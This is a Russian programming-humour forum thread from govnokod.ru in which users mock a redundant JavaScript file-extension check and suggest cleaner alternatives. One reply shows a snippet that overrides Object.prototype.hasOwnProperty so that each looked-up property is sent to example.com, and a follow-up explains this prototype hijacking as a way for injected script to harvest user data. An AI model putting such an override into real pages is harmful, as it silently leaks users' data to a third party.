Говнокод: по колено в коде.

• Все
• Лучший
• Сток
• Глупый поиск
• Наговнокодить!
• Oтзывы

Нашли или выдавили из себя код, который нельзя назвать нормальным, на который без улыбки не взглянешь? Не торопитесь его удалять или рефакторить, — запостите его на говнокод.ру, посмеёмся вместе!

1. PHP (5698)
2. C++ (2733)
3. Куча (2324)
4. JavaScript (2027)
5. C# (1925)
6. Java (1501)
7. Си (1095)
8. Pascal (647)
9. Python (582)
10. 1C (531)
11. SQL (431)
12. ActionScript (292)
13. Objective C (202)
14. bash (196)
15. Perl (194)
16. Assembler (146)
17. Ruby (142)
18. VisualBasic (138)
19. Lua (49)
20. Go (28)
21. Swift (27)
22. Haskell (26)
23. Kotlin (13)

1. JavaScript / Говнокод #10362

   +148

   1. 1

   if(type_file=='png'||type_file=='jpg'||type_file=='gif'||type_file=='jpeg'||type_file=='png')

   Запостил: хуита, 24 Мая 2012

   Tweet

   Комментарии (33) RSS

   • rsod 24.05.2012 21:40 # −2

     ну может не любит человек регулярки..

     Ответить

     • vistefan 24.05.2012 22:41 # +2

       Не любит регулярки - пусть делает массив и проверяет оперетором in.
       За одно получит простоту расширяемости и очевидность кода.

       Ответить

       • JavaGovno 25.05.2012 08:24 # +1

         in научили с массивами работать? ай да ECMA, ай да сукины дети!

         Ответить

       • roman-kashitsyn 25.05.2012 10:48 # 0

         var allowedExtensions = {'png': 1, 'jpg': 1, 'jpeg': 1, 'gif': 1};
         if (allowedExtensions.hasOwnProperty(fileType.toLowerCase())) {
             // yep
         }

         Ответить

         • Steve_Brown 25.05.2012 11:45 # 0

           "png.jpg.gif.jpeg".Contains(fileType )

           Ответить

           • wvxvw 25.05.2012 17:49 # +3

             peg.f.j ?

             Ответить

             • bormand 25.05.2012 17:53 # +1

               lol.g.g

               Ответить

             • vistefan 25.05.2012 18:27 # 0

               Смотря чем вы собираетесь отломать от имени файла расширение. Если самописной функцией с учётом того, что расширение - это часть имени файла, идущая после последней точки и состоящая только из букв латинского алфавита и цифр, то, в сочетании с ограничением по длине расширения, предложенный Steve_Brown вариант неплох.

               Ответить

               • wvxvw 25.05.2012 23:09 # +4

                 !("pngjpggifjpeg".indexOf(extension) % 3)

                 Ответить

               • wvxvw 25.05.2012 23:14 # 0

                 Но так же не застраховано от XXS.

                 Ответить

                 • vistefan 26.05.2012 08:41 # 0

                   Вы имели ввиду XSS?

                   Ответить

                   • wvxvw 26.05.2012 09:30 # 0

                     хехе, он самый :)

                     Ответить

                     • vistefan 26.05.2012 10:12 # 0

                       И что же именно с такой конструкцией можно сделать средствами XSS, если не секрет?

                       Ответить

                       • wvxvw 26.05.2012 11:21 # +1

                         Когда известно, что какие-то пользовательские данные передаются в функции определенные на прототипе какого-то из базовых классов (Object, String и т.д.) то можно переопределить эти методы (при условии, что наш, т.е. вредительский скрипт загрузился) и собирать эти самые пользовательские данные. Но с этим как бы тяжело бороться, т.как иначе прийдется отказаться от использования всего, что можно переопределить в Яваскрипте - и останутся только операторы и пользовательские замыкания / то что объявлено внутри замыканий. Но это уж так задуман Яваскрипт. Это как чтение за пределами массива в Си - фича языка, которая делает его всегда потенциально опасным, и чтобы сделать его безопасным - проще отказаться вообще, чем пытаться из того, что осталось что-то слепить.

                         Ответить

                         • vistefan 26.05.2012 11:31 # 0

                           В контексте данной задачи - предварительная поверхностная проверка типа файла - это не так уж и страшно. В худшем случае злоумышленник сможет отправить левый файл скрипту, но на стороне сервера всё равно должна пройти более глубокая проверка. Скрипт просто отсекает количество подробных проверок, уменьшая нагрузку на сервер. Таким образом, жизнеспособен вариант Steve_Brown, а ваш - способ его улучшения.

                           Ответить

                         • roman-kashitsyn 28.05.2012 09:59 # 0

                           В любом деле, не только в программировании, всегда куча граблей. Чтобы стать профессионалом в этом самом деле, нужно наступить на все эти грабли самому.
                           
                           Инженеры-программисты для того и нужны, чтобы знать, где надо проверить границы массива, как не позволить заинжектить на страничку левый код, где будет профит от ленивых вычислений, и т.д.

                           Ответить

         • wvxvw 25.05.2012 18:06 # 0

           Object.prototype._hasOwnProperty = Object.prototype.hasOwnProperty;
           Object.prototype.hasOwnProperty =
           	function(property) {
           		ajax.send("example.com?property=" + property);
           		return this._hasOwnProperty(property);
           }

           Ответить

         • glprizes 28.05.2012 13:40 # +2

           if ["png", "jpg", "jpeg", "gif"].indexOf(type_file) != -1 {
             //
           }

           Ответить

           • roman-kashitsyn 28.05.2012 13:53 # 0

             интерпретатор ошибку выдаст pythonista?

             Ответить

             • glprizes 28.05.2012 13:59 # 0

               Да, забыл круглые скобки вокруг выражения

               Ответить

               • roman-kashitsyn 28.05.2012 14:06 # 0

                 Мне больше нравится lookup по табличке чем проход по списку. Хотя в этом случае выигрыш, скорее всего, нулевой.

                 Ответить

   • someone 24.05.2012 21:43 # −5

     показать все, что скрытоПроверять тип файла по расширению - не Ъ. Нужно анализировать содержимое.

     Ответить

     • rsod 24.05.2012 21:44 # +3

       > язык: JavaScript

       Ответить

     • alex322 24.05.2012 22:35 # +5

       Ох, хотелось бы взглянуть на такой "анализатор"... Думаю дурная идея таким заниматься на яваскрипте

       Ответить

       • Steve_Brown 25.05.2012 10:35 # +1

         Помнится, недавно BMP загружали...
         http://habrahabr.ru/post/143985/

         Ответить

   • bormand 25.05.2012 05:28 # +2

     Не учтены PnG, pnG, Png и т.п, зато вот png два раза :)

     Ответить

     • Edd 25.05.2012 07:44 # +3

       Возможно до этого lowercase есть

       Ответить

   • bormand 25.05.2012 07:55 # +1

     type file - файл типа
     file type - тип файла

     Ответить

     • vistefan 25.05.2012 12:54 # −6

       показать все, что скрытоhttp://clck.ru/18XN9

       Ответить

       • roman-kashitsyn 25.05.2012 12:56 # +2

         гуглопереводчик, безусловно, очень авторитетный источник

         Ответить

         • vistefan 25.05.2012 13:01 # −1

           sarcasmed

           Ответить

   • guest 25.05.2012 10:16 # +1

     типа файл
     файл типа

     Ответить

   • govnomonad 25.05.2012 15:29 # −1

     mime? Не, не слышал

     Ответить

   Добавить комментарий

   Ошибка компиляции комментария:

   1. Гости могут высказаться только во вторник, пятницу или субботу

   Где здесь C++, guest?!

   А не использовать ли нам bbcode?

   • [b]жирный[/b] — жирный
   • [i]курсив[/i] — курсив
   • [u]подчеркнутый[/u] — подчеркнутый
   • [s]перечеркнутый[/s] — перечеркнутый
   • [blink]мигающий[/blink] — мигающий
   • [color=red]цвет[/color] — цвет (подробнее)
   • [size=20]размер[/size] — размер (подробнее)
   • [code=<language>]some code[/code] (подробнее)

   Проверочный код: *